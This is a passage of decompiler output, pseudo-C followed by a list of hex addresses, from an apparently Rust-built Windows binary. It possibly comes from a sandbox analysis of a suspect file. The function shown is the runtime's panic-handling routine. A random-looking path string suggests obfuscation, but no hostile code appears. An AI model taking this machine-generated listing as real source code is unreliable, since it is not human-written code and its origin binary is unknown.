                                                                                                                                                                                      				void* _v112;
                                                                                                                                                                                      				long _v116;
                                                                                                                                                                                      				void* _v120;
                                                                                                                                                                                      				long _v124;
                                                                                                                                                                                      				char _v128;
                                                                                                                                                                                      				intOrPtr _v132;
                                                                                                                                                                                      				void _v136;
                                                                                                                                                                                      				void* _v140;
                                                                                                                                                                                      				intOrPtr _v144;
                                                                                                                                                                                      				signed int _v148;
                                                                                                                                                                                      				intOrPtr _v152;
                                                                                                                                                                                      				intOrPtr* _t190;
                                                                                                                                                                                      				void* _t194;
                                                                                                                                                                                      				void _t195;
                                                                                                                                                                                      				intOrPtr* _t196;
                                                                                                                                                                                      				signed int _t197;
                                                                                                                                                                                      				signed int _t199;
                                                                                                                                                                                      				char* _t201;
                                                                                                                                                                                      				long _t202;
                                                                                                                                                                                      				long _t203;
                                                                                                                                                                                      				void* _t204;
                                                                                                                                                                                      				void* _t205;
                                                                                                                                                                                      				long _t206;
                                                                                                                                                                                      				void _t209;
                                                                                                                                                                                      				void _t210;
                                                                                                                                                                                      				void* _t219;
                                                                                                                                                                                      				void* _t222;
                                                                                                                                                                                      				long _t226;
                                                                                                                                                                                      				void* _t235;
                                                                                                                                                                                      				void* _t245;
                                                                                                                                                                                      				void* _t247;
                                                                                                                                                                                      				void* _t248;
                                                                                                                                                                                      				char** _t251;
                                                                                                                                                                                      				char** _t252;
                                                                                                                                                                                      				void* _t256;
                                                                                                                                                                                      				void* _t260;
                                                                                                                                                                                      				void _t264;
                                                                                                                                                                                      				char _t265;
                                                                                                                                                                                      				signed char _t267;
                                                                                                                                                                                      				void _t270;
                                                                                                                                                                                      				intOrPtr _t273;
                                                                                                                                                                                      				void* _t275;
                                                                                                                                                                                      				char* _t276;
                                                                                                                                                                                      				void _t277;
                                                                                                                                                                                      				void* _t280;
                                                                                                                                                                                      				intOrPtr _t291;
                                                                                                                                                                                      				intOrPtr _t295;
                                                                                                                                                                                      				void _t298;
                                                                                                                                                                                      				long _t302;
                                                                                                                                                                                      				void* _t307;
                                                                                                                                                                                      				void* _t308;
                                                                                                                                                                                      				void* _t309;
                                                                                                                                                                                      				signed int _t310;
                                                                                                                                                                                      				signed int _t312;
                                                                                                                                                                                      				void* _t318;
                                                                                                                                                                                      				intOrPtr* _t324;
                                                                                                                                                                                      				long _t326;
                                                                                                                                                                                      				void* _t327;
                                                                                                                                                                                      				void* _t330;
                                                                                                                                                                                      				void* _t331;
                                                                                                                                                                                      				void* _t332;
                                                                                                                                                                                      				void* _t333;
                                                                                                                                                                                      				void* _t334;
                                                                                                                                                                                      				void* _t335;
                                                                                                                                                                                      				intOrPtr _t336;
                                                                                                                                                                                      				void* _t347;
                                                                                                                                                                                      				void* _t360;
                                                                                                                                                                                      				long _t361;
                                                                                                                                                                                      
                                                                                                                                                                                      				_v32 = _t336;
                                                                                                                                                                                      				_v20 = 0xffffffff;
                                                                                                                                                                                      				_v24 = E6E9E39A0;
                                                                                                                                                                                      				_t264 = _t270;
                                                                                                                                                                                      				_t332 = 1;
                                                                                                                                                                                      				_t330 = _t307;
                                                                                                                                                                                      				_v28 =  *[fs:0x0];
                                                                                                                                                                                      				 *[fs:0x0] =  &_v28;
                                                                                                                                                                                      				asm("lock xadd [0x6ea2e120], esi");
                                                                                                                                                                                      				_t190 = E6E9DD000(_t264, _t330);
                                                                                                                                                                                      				_t337 = _t190;
                                                                                                                                                                                      				if(_t190 == 0) {
                                                                                                                                                                                      					_t190 = E6E9F95A0(_t264,  &M6EA1F8F7, 0x46, _t337,  &_v68, 0x6ea1f870, 0x6ea1f9bc);
                                                                                                                                                                                      					_t336 = _t336 + 0xc;
                                                                                                                                                                                      					asm("ud2");
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t308 = _a8;
                                                                                                                                                                                      				_t273 =  *_t190 + 1;
                                                                                                                                                                                      				 *_t190 = _t273;
                                                                                                                                                                                      				if(_t332 < 0 || _t273 >= 3) {
                                                                                                                                                                                      					__eflags = _t273 - 2;
                                                                                                                                                                                      					if(__eflags <= 0) {
                                                                                                                                                                                      						_v124 = 0x6ea1f570;
                                                                                                                                                                                      						_v120 = 0x6ea1f824;
                                                                                                                                                                                      						_v68 = 0x6ea20260;
                                                                                                                                                                                      						_v64 = 2;
                                                                                                                                                                                      						_v96 = 0;
                                                                                                                                                                                      						_v100 = 0;
                                                                                                                                                                                      						_v60 = 0;
                                                                                                                                                                                      						_v116 = _a4;
                                                                                                                                                                                      						_v112 = _t308;
                                                                                                                                                                                      						_t309 =  &_v68;
                                                                                                                                                                                      						_v80 =  &_v124;
                                                                                                                                                                                      						_v76 = E6E9D2470;
                                                                                                                                                                                      						_v52 =  &_v80;
                                                                                                                                                                                      						_v48 = 1;
                                                                                                                                                                                      						_t194 = E6E9DD0F0( &_v100, __eflags);
                                                                                                                                                                                      						__eflags = _t194 - 3;
                                                                                                                                                                                      						if(_t194 == 3) {
                                                                                                                                                                                      							_v20 = 0;
                                                                                                                                                                                      							_v36 = _t309;
                                                                                                                                                                                      							 *((intOrPtr*)( *((intOrPtr*)(_t309 + 4))))( *_t309);
                                                                                                                                                                                      							_t336 = _t336 + 4;
                                                                                                                                                                                      							L11:
                                                                                                                                                                                      							_t332 = _v36;
                                                                                                                                                                                      							_t302 =  *(_t332 + 4);
                                                                                                                                                                                      							__eflags =  *(4 + _t302);
                                                                                                                                                                                      							if( *(4 + _t302) != 0) {
                                                                                                                                                                                      								_t256 =  *_t332;
                                                                                                                                                                                      								__eflags =  *((intOrPtr*)(_t302 + 8)) - 9;
                                                                                                                                                                                      								if( *((intOrPtr*)(_t302 + 8)) >= 9) {
                                                                                                                                                                                      									_t256 =  *(_t256 - 4);
                                                                                                                                                                                      								}
                                                                                                                                                                                      								HeapFree( *0x6ea2e128, 0, _t256);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t194 = HeapFree( *0x6ea2e128, 0, _t332);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t327 =  &_v68;
                                                                                                                                                                                      					_v68 = 0x6ea20224;
                                                                                                                                                                                      					_v64 = 1;
                                                                                                                                                                                      					_v60 = 0;
                                                                                                                                                                                      					_v52 = 0x6ea1f570;
                                                                                                                                                                                      					_v120 = 0;
                                                                                                                                                                                      					_v124 = 0;
                                                                                                                                                                                      					_v48 = 0;
                                                                                                                                                                                      					_t194 = E6E9DD0F0( &_v124, __eflags);
                                                                                                                                                                                      					__eflags = _t194 - 3;
                                                                                                                                                                                      					if(_t194 != 3) {
                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_v20 = 1;
                                                                                                                                                                                      						_v36 = _t327;
                                                                                                                                                                                      						 *((intOrPtr*)( *((intOrPtr*)(_t327 + 4))))( *_t327);
                                                                                                                                                                                      						_t336 = _t336 + 4;
                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_v132 = _t273;
                                                                                                                                                                                      					__imp__AcquireSRWLockShared(0x6ea2e11c);
                                                                                                                                                                                      					_v144 = 0x6ea2e11c;
                                                                                                                                                                                      					_v20 = 2;
                                                                                                                                                                                      					_v136 = _t264;
                                                                                                                                                                                      					_v140 = _t330;
                                                                                                                                                                                      					_t260 =  *((intOrPtr*)(_t330 + 0x10))(_t264);
                                                                                                                                                                                      					_t336 = _t336 + 4;
                                                                                                                                                                                      					_v36 = _t260;
                                                                                                                                                                                      					_v40 = _t308;
                                                                                                                                                                                      					_t194 = E6E9DD000(_t264, _t330);
                                                                                                                                                                                      					_t330 = _v40;
                                                                                                                                                                                      					_t340 = _t194;
                                                                                                                                                                                      					if(_t194 != 0) {
                                                                                                                                                                                      						L17:
                                                                                                                                                                                      						__eflags =  *_t194 - 1;
                                                                                                                                                                                      						_t275 = 1;
                                                                                                                                                                                      						if( *_t194 <= 1) {
                                                                                                                                                                                      							_t195 =  *0x6ea2e110; // 0x0
                                                                                                                                                                                      							_t310 = _a8;
                                                                                                                                                                                      							__eflags = _t195 - 2;
                                                                                                                                                                                      							if(_t195 == 2) {
                                                                                                                                                                                      								_t275 = 0;
                                                                                                                                                                                      								goto L19;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t195 - 1;
                                                                                                                                                                                      							if(_t195 == 1) {
                                                                                                                                                                                      								_t275 = 4;
                                                                                                                                                                                      								goto L19;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t195;
                                                                                                                                                                                      							if(_t195 != 0) {
                                                                                                                                                                                      								goto L19;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							E6E9DD380(_t264,  &_v68, _t330, _t332);
                                                                                                                                                                                      							_t330 = _v40;
                                                                                                                                                                                      							_t248 = _v68;
                                                                                                                                                                                      							__eflags = _t248;
                                                                                                                                                                                      							if(_t248 != 0) {
                                                                                                                                                                                      								goto L68;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t267 = 5;
                                                                                                                                                                                      							goto L86;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t310 = _a8;
                                                                                                                                                                                      						goto L19;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						E6E9F95A0(_t264,  &M6EA1F8F7, 0x46, _t340,  &_v68, 0x6ea1f870, 0x6ea1f9bc);
                                                                                                                                                                                      						_t336 = _t336 + 0xc;
                                                                                                                                                                                      						L61:
                                                                                                                                                                                      						asm("ud2");
                                                                                                                                                                                      						L62:
                                                                                                                                                                                      						_t276 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
                                                                                                                                                                                      						_t201 = 0xc;
                                                                                                                                                                                      						L21:
                                                                                                                                                                                      						_v100 = _t276;
                                                                                                                                                                                      						_v96 = _t201;
                                                                                                                                                                                      						_t202 =  *0x6ea2d044; // 0x0
                                                                                                                                                                                      						if(_t202 == 0) {
                                                                                                                                                                                      							_t280 = 0x6ea2d044;
                                                                                                                                                                                      							_t202 = E6E9E2960(_t264, 0x6ea2d044, _t330, _t332);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t194 = TlsGetValue(_t202);
                                                                                                                                                                                      						if(_t194 <= 1) {
                                                                                                                                                                                      							L42:
                                                                                                                                                                                      							_t203 =  *0x6ea2d044; // 0x0
                                                                                                                                                                                      							__eflags = _t203;
                                                                                                                                                                                      							if(_t203 == 0) {
                                                                                                                                                                                      								_t280 = 0x6ea2d044;
                                                                                                                                                                                      								_t203 = E6E9E2960(_t264, 0x6ea2d044, _t330, _t332);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t194 = TlsGetValue(_t203);
                                                                                                                                                                                      							__eflags = _t194;
                                                                                                                                                                                      							if(_t194 == 0) {
                                                                                                                                                                                      								_t204 =  *0x6ea2e128; // 0x2a40000
                                                                                                                                                                                      								__eflags = _t204;
                                                                                                                                                                                      								if(_t204 != 0) {
                                                                                                                                                                                      									L66:
                                                                                                                                                                                      									_t205 = HeapAlloc(_t204, 0, 0x10);
                                                                                                                                                                                      									__eflags = _t205;
                                                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                                                      										 *_t205 = 0;
                                                                                                                                                                                      										 *(_t205 + 0xc) = 0x6ea2d044;
                                                                                                                                                                                      										_t332 = _t205;
                                                                                                                                                                                      										_t206 =  *0x6ea2d044; // 0x0
                                                                                                                                                                                      										__eflags = _t206;
                                                                                                                                                                                      										if(_t206 == 0) {
                                                                                                                                                                                      											_v36 = _t332;
                                                                                                                                                                                      											_t206 = E6E9E2960(_t264, 0x6ea2d044, _t330, _t332);
                                                                                                                                                                                      											_t332 = _v36;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t194 = TlsSetValue(_t206, _t332);
                                                                                                                                                                                      										goto L75;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									L67:
                                                                                                                                                                                      									_t248 = E6E9F92F0(_t264, 0x10, 4, _t330, _t332, __eflags);
                                                                                                                                                                                      									asm("ud2");
                                                                                                                                                                                      									L68:
                                                                                                                                                                                      									_t326 = _v60;
                                                                                                                                                                                      									_t298 = _v64;
                                                                                                                                                                                      									__eflags = _t326 - 4;
                                                                                                                                                                                      									if(_t326 == 4) {
                                                                                                                                                                                      										__eflags =  *_t248 - 0x6c6c7566;
                                                                                                                                                                                      										if( *_t248 != 0x6c6c7566) {
                                                                                                                                                                                      											L83:
                                                                                                                                                                                      											_t332 = 2;
                                                                                                                                                                                      											_t267 = 0;
                                                                                                                                                                                      											__eflags = 0;
                                                                                                                                                                                      											L84:
                                                                                                                                                                                      											__eflags = _t298;
                                                                                                                                                                                      											if(_t298 != 0) {
                                                                                                                                                                                      												HeapFree( *0x6ea2e128, 0, _t248);
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L86:
                                                                                                                                                                                      											__eflags = _t267 - 5;
                                                                                                                                                                                      											_t310 = _a8;
                                                                                                                                                                                      											_t269 =  !=  ? _t332 : 1;
                                                                                                                                                                                      											_t275 =  !=  ? _t267 & 0x000000ff : 4;
                                                                                                                                                                                      											_t142 =  !=  ? _t332 : 1;
                                                                                                                                                                                      											_t264 =  *0x6ea2e110;
                                                                                                                                                                                      											 *0x6ea2e110 =  !=  ? _t332 : 1;
                                                                                                                                                                                      											L19:
                                                                                                                                                                                      											_v148 = _t310;
                                                                                                                                                                                      											_v128 = _t275;
                                                                                                                                                                                      											_t59 = _t330 + 0xc; // 0x6e9e3290
                                                                                                                                                                                      											_t196 =  *_t59;
                                                                                                                                                                                      											_v40 = _t196;
                                                                                                                                                                                      											_t197 =  *_t196(_v36);
                                                                                                                                                                                      											_t336 = _t336 + 4;
                                                                                                                                                                                      											_t312 = _t310 ^ 0x7ef2a91e | _t197 ^ 0xecc7bcf4;
                                                                                                                                                                                      											__eflags = _t312;
                                                                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                                                                      												_t199 = _v40(_v36);
                                                                                                                                                                                      												_t336 = _t336 + 4;
                                                                                                                                                                                      												__eflags = _t312 ^ 0xe43a67d8 | _t199 ^ 0xbae7a625;
                                                                                                                                                                                      												if(__eflags != 0) {
                                                                                                                                                                                      													goto L62;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t251 = _v36;
                                                                                                                                                                                      												_t276 =  *_t251;
                                                                                                                                                                                      												_t201 = _t251[2];
                                                                                                                                                                                      												goto L21;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_t252 = _v36;
                                                                                                                                                                                      											_t276 =  *_t252;
                                                                                                                                                                                      											_t201 = _t252[1];
                                                                                                                                                                                      											goto L21;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t267 = 1;
                                                                                                                                                                                      										_t332 = 3;
                                                                                                                                                                                      										goto L84;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									__eflags = _t326 - 1;
                                                                                                                                                                                      									if(_t326 != 1) {
                                                                                                                                                                                      										goto L83;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									__eflags =  *_t248 - 0x30;
                                                                                                                                                                                      									if( *_t248 != 0x30) {
                                                                                                                                                                                      										goto L83;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t267 = 4;
                                                                                                                                                                                      									_t332 = 1;
                                                                                                                                                                                      									goto L84;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t204 = GetProcessHeap();
                                                                                                                                                                                      								__eflags = _t204;
                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                      									goto L67;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								 *0x6ea2e128 = _t204;
                                                                                                                                                                                      								goto L66;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t332 = _t194;
                                                                                                                                                                                      								__eflags = _t194 - 1;
                                                                                                                                                                                      								if(_t194 != 1) {
                                                                                                                                                                                      									L75:
                                                                                                                                                                                      									_t277 =  *(_t332 + 8);
                                                                                                                                                                                      									__eflags =  *_t332;
                                                                                                                                                                                      									_t136 = _t332 + 4; // 0x4
                                                                                                                                                                                      									_t330 = _t136;
                                                                                                                                                                                      									 *_t332 = 1;
                                                                                                                                                                                      									 *(_t332 + 4) = 0;
                                                                                                                                                                                      									 *(_t332 + 8) = 0;
                                                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                                                      										__eflags = _t277;
                                                                                                                                                                                      										if(__eflags != 0) {
                                                                                                                                                                                      											asm("lock dec dword [ecx]");
                                                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                                                      												_t194 = E6E9DC640(_t277);
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      									goto L26;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_v84 = 0;
                                                                                                                                                                                      								_v36 = 0;
                                                                                                                                                                                      								_t210 = 0;
                                                                                                                                                                                      								__eflags = 0;
                                                                                                                                                                                      								goto L47;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t330 = _t194;
                                                                                                                                                                                      							if( *_t194 != 1) {
                                                                                                                                                                                      								goto L42;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t330 = _t330 + 4;
                                                                                                                                                                                      							L26:
                                                                                                                                                                                      							if( *_t330 != 0) {
                                                                                                                                                                                      								E6E9F95A0(_t264, "already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd", 0x10, __eflags,  &_v68, 0x6ea1f860, 0x6ea1ff30);
                                                                                                                                                                                      								_t336 = _t336 + 0xc;
                                                                                                                                                                                      								goto L61;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							 *_t330 = 0xffffffff;
                                                                                                                                                                                      							_t332 =  *(_t330 + 4);
                                                                                                                                                                                      							if(_t332 == 0) {
                                                                                                                                                                                      								_v36 = _t330;
                                                                                                                                                                                      								_v20 = 8;
                                                                                                                                                                                      								_t247 = E6E9DC4D0(_t264, _t330, _t332);
                                                                                                                                                                                      								_t330 = _v36;
                                                                                                                                                                                      								_t332 = _t247;
                                                                                                                                                                                      								_t194 =  *(_t330 + 4);
                                                                                                                                                                                      								_t347 = _t194;
                                                                                                                                                                                      								if(_t347 != 0) {
                                                                                                                                                                                      									asm("lock dec dword [eax]");
                                                                                                                                                                                      									if(_t347 == 0) {
                                                                                                                                                                                      										_t280 =  *(_t330 + 4);
                                                                                                                                                                                      										_t194 = E6E9DC640(_t280);
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								 *(_t330 + 4) = _t332;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							asm("lock inc dword [esi]");
                                                                                                                                                                                      							if(_t347 <= 0) {
                                                                                                                                                                                      								L16:
                                                                                                                                                                                      								asm("ud2");
                                                                                                                                                                                      								asm("ud2");
                                                                                                                                                                                      								goto L17;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								 *_t330 =  *_t330 + 1;
                                                                                                                                                                                      								_v84 = _t332;
                                                                                                                                                                                      								_v36 = _t332;
                                                                                                                                                                                      								if(_t332 != 0) {
                                                                                                                                                                                      									_t209 =  *(_t332 + 0x10);
                                                                                                                                                                                      									__eflags = _t209;
                                                                                                                                                                                      									_t280 =  ==  ? _t209 : _t332 + 0x10;
                                                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                                                      										L103:
                                                                                                                                                                                      										_t210 =  *_t280;
                                                                                                                                                                                      										_t280 =  *((intOrPtr*)(_t280 + 4)) - 1;
                                                                                                                                                                                      										L104:
                                                                                                                                                                                      										_v20 = 3;
                                                                                                                                                                                      										L47:
                                                                                                                                                                                      										_v124 = 0x6ea2010c;
                                                                                                                                                                                      										_v120 = 4;
                                                                                                                                                                                      										_v72 = 0;
                                                                                                                                                                                      										_v88 = 0;
                                                                                                                                                                                      										_v92 = 0;
                                                                                                                                                                                      										_v116 = 0;
                                                                                                                                                                                      										_v20 = 3;
                                                                                                                                                                                      										_t317 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
                                                                                                                                                                                      										_t212 =  !=  ? _t280 : 9;
                                                                                                                                                                                      										_v80 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
                                                                                                                                                                                      										_t318 =  &_v124;
                                                                                                                                                                                      										_v76 =  !=  ? _t280 : 9;
                                                                                                                                                                                      										_v68 =  &_v80;
                                                                                                                                                                                      										_v64 = 0x6e9ddca0;
                                                                                                                                                                                      										_v60 =  &_v100;
                                                                                                                                                                                      										_v56 = 0x6e9ddca0;
                                                                                                                                                                                      										_v52 =  &_v148;
                                                                                                                                                                                      										_v48 = E6E9DDCC0;
                                                                                                                                                                                      										_v108 =  &_v68;
                                                                                                                                                                                      										_v104 = 3;
                                                                                                                                                                                      										if(E6E9DD0F0( &_v92, _t210) == 3) {
                                                                                                                                                                                      											_v20 = 7;
                                                                                                                                                                                      											_v40 = _t318;
                                                                                                                                                                                      											 *((intOrPtr*)( *((intOrPtr*)(_t318 + 4))))( *_t318);
                                                                                                                                                                                      											_t336 = _t336 + 4;
                                                                                                                                                                                      											_t335 = _v40;
                                                                                                                                                                                      											_t295 =  *((intOrPtr*)(_t335 + 4));
                                                                                                                                                                                      											if( *((intOrPtr*)(_t295 + 4)) != 0) {
                                                                                                                                                                                      												_t245 =  *_t335;
                                                                                                                                                                                      												if( *((intOrPtr*)(_t295 + 8)) >= 9) {
                                                                                                                                                                                      													_t245 =  *(_t245 - 4);
                                                                                                                                                                                      												}
                                                                                                                                                                                      												HeapFree( *0x6ea2e128, 0, _t245);
                                                                                                                                                                                      											}
                                                                                                                                                                                      											HeapFree( *0x6ea2e128, 0, _t335);
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t265 = _v128;
                                                                                                                                                                                      										_t219 =  <  ? (_t265 + 0x000000fd & 0x000000ff) + 1 : 0;
                                                                                                                                                                                      										if(_t219 == 0) {
                                                                                                                                                                                      											__imp__AcquireSRWLockExclusive(0x6ea2e10c);
                                                                                                                                                                                      											_v68 = 0x6ea1fad0;
                                                                                                                                                                                      											_v64 = 1;
                                                                                                                                                                                      											_v152 = 0x6ea2e10c;
                                                                                                                                                                                      											_v41 = _t265;
                                                                                                                                                                                      											_v60 = 0;
                                                                                                                                                                                      											_v20 = 6;
                                                                                                                                                                                      											_v124 =  &_v41;
                                                                                                                                                                                      											_v120 = E6E9DDD30;
                                                                                                                                                                                      											_v52 =  &_v124;
                                                                                                                                                                                      											_v48 = 1;
                                                                                                                                                                                      											_t222 = E6E9DD0F0( &_v92, __eflags);
                                                                                                                                                                                      											_t333 =  &_v68;
                                                                                                                                                                                      											__imp__ReleaseSRWLockExclusive(0x6ea2e10c);
                                                                                                                                                                                      											__eflags = _t222 - 3;
                                                                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                                                                      												goto L94;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_v20 = 5;
                                                                                                                                                                                      											_v40 = _t333;
                                                                                                                                                                                      											 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
                                                                                                                                                                                      											_t336 = _t336 + 4;
                                                                                                                                                                                      											goto L89;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											if(_t219 == 1) {
                                                                                                                                                                                      												L94:
                                                                                                                                                                                      												_t360 = _v36;
                                                                                                                                                                                      												if(_t360 != 0) {
                                                                                                                                                                                      													asm("lock dec dword [eax]");
                                                                                                                                                                                      													if(_t360 == 0) {
                                                                                                                                                                                      														E6E9DC640(_v84);
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t334 = _v140;
                                                                                                                                                                                      												_t331 = _v136;
                                                                                                                                                                                      												_t361 = _v72;
                                                                                                                                                                                      												if(_t361 != 0) {
                                                                                                                                                                                      													asm("lock dec dword [eax]");
                                                                                                                                                                                      													if(_t361 == 0) {
                                                                                                                                                                                      														E6E9DDA70(_v72);
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__imp__ReleaseSRWLockShared(0x6ea2e11c);
                                                                                                                                                                                      												_t362 = _v132 - 1;
                                                                                                                                                                                      												_v20 = 0xffffffff;
                                                                                                                                                                                      												if(_v132 > 1) {
                                                                                                                                                                                      													_v68 = 0x6ea2029c;
                                                                                                                                                                                      													_v64 = 1;
                                                                                                                                                                                      													_v60 = 0;
                                                                                                                                                                                      													_v52 = 0x6ea1f570;
                                                                                                                                                                                      													_v76 = 0;
                                                                                                                                                                                      													_v80 = 0;
                                                                                                                                                                                      													_v48 = 0;
                                                                                                                                                                                      													_t226 = E6E9DD0F0( &_v80, _t362);
                                                                                                                                                                                      													_v120 =  &_v68;
                                                                                                                                                                                      													_v124 = _t226;
                                                                                                                                                                                      													E6E9DD2B0( &_v124);
                                                                                                                                                                                      													asm("ud2");
                                                                                                                                                                                      													asm("ud2");
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t280 = _t331;
                                                                                                                                                                                      												E6E9DD290(_t280, _t334);
                                                                                                                                                                                      												asm("ud2");
                                                                                                                                                                                      												goto L103;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											 *0x6ea2d040 = 0;
                                                                                                                                                                                      											_t356 =  *0x6ea2d040;
                                                                                                                                                                                      											if( *0x6ea2d040 == 0) {
                                                                                                                                                                                      												goto L94;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_t324 =  &_v68;
                                                                                                                                                                                      											_v68 = 0x6ea2017c;
                                                                                                                                                                                      											_v64 = 1;
                                                                                                                                                                                      											_v60 = 0;
                                                                                                                                                                                      											_v52 = 0x6ea1f570;
                                                                                                                                                                                      											_v48 = 0;
                                                                                                                                                                                      											_v20 = 3;
                                                                                                                                                                                      											if(E6E9DD0F0( &_v92, _t356) != 3) {
                                                                                                                                                                                      												goto L94;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_v40 = _t324;
                                                                                                                                                                                      											_v20 = 4;
                                                                                                                                                                                      											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
                                                                                                                                                                                      											_t336 = _t336 + 4;
                                                                                                                                                                                      											L89:
                                                                                                                                                                                      											_t291 =  *((intOrPtr*)(_v40 + 4));
                                                                                                                                                                                      											if( *((intOrPtr*)(_t291 + 4)) != 0) {
                                                                                                                                                                                      												_t235 =  *_v40;
                                                                                                                                                                                      												if( *((intOrPtr*)(_t291 + 8)) >= 9) {
                                                                                                                                                                                      													_t235 =  *(_t235 - 4);
                                                                                                                                                                                      												}
                                                                                                                                                                                      												HeapFree( *0x6ea2e128, 0, _t235);
                                                                                                                                                                                      											}
                                                                                                                                                                                      											HeapFree( *0x6ea2e128, 0, _v40);
                                                                                                                                                                                      											goto L94;
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t210 = 0;
                                                                                                                                                                                      									goto L104;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t210 = 0;
                                                                                                                                                                                      								goto L47;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}






























































































                                                                                                                                                                                      0x6e9dc70c
                                                                                                                                                                                      0x6e9dc70f
                                                                                                                                                                                      0x6e9dc716
                                                                                                                                                                                      0x6e9dc71d
                                                                                                                                                                                      0x6e9dc722
                                                                                                                                                                                      0x6e9dc727
                                                                                                                                                                                      0x6e9dc730
                                                                                                                                                                                      0x6e9dc733
                                                                                                                                                                                      0x6e9dc739
                                                                                                                                                                                      0x6e9dc741
                                                                                                                                                                                      0x6e9dc746
                                                                                                                                                                                      0x6e9dc748
                                                                                                                                                                                      0x6e9dc762
                                                                                                                                                                                      0x6e9dc767
                                                                                                                                                                                      0x6e9dc76a
                                                                                                                                                                                      0x6e9dc76a
                                                                                                                                                                                      0x6e9dc76e
                                                                                                                                                                                      0x6e9dc771
                                                                                                                                                                                      0x6e9dc774
                                                                                                                                                                                      0x6e9dc776
                                                                                                                                                                                      0x6e9dc7ea
                                                                                                                                                                                      0x6e9dc7ed
                                                                                                                                                                                      0x6e9dc84a
                                                                                                                                                                                      0x6e9dc851
                                                                                                                                                                                      0x6e9dc85b
                                                                                                                                                                                      0x6e9dc862
                                                                                                                                                                                      0x6e9dc869
                                                                                                                                                                                      0x6e9dc86d
                                                                                                                                                                                      0x6e9dc874
                                                                                                                                                                                      0x6e9dc87b
                                                                                                                                                                                      0x6e9dc881
                                                                                                                                                                                      0x6e9dc884
                                                                                                                                                                                      0x6e9dc887
                                                                                                                                                                                      0x6e9dc88d
                                                                                                                                                                                      0x6e9dc894
                                                                                                                                                                                      0x6e9dc897
                                                                                                                                                                                      0x6e9dc89e
                                                                                                                                                                                      0x6e9dc8a3
                                                                                                                                                                                      0x6e9dc8a5
                                                                                                                                                                                      0x6e9dc8ac
                                                                                                                                                                                      0x6e9dc8b4
                                                                                                                                                                                      0x6e9dc8b7
                                                                                                                                                                                      0x6e9dc8b9
                                                                                                                                                                                      0x6e9dc8bc
                                                                                                                                                                                      0x6e9dc8bc
                                                                                                                                                                                      0x6e9dc8bf
                                                                                                                                                                                      0x6e9dc8c2
                                                                                                                                                                                      0x6e9dc8c6
                                                                                                                                                                                      0x6e9dc8c8
                                                                                                                                                                                      0x6e9dc8ca
                                                                                                                                                                                      0x6e9dc8ce
                                                                                                                                                                                      0x6e9dc8d0
                                                                                                                                                                                      0x6e9dc8d0
                                                                                                                                                                                      0x6e9dc8dc
                                                                                                                                                                                      0x6e9dc8dc
                                                                                                                                                                                      0x6e9dc8ea
                                                                                                                                                                                      0x6e9dc8ea
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc8a5
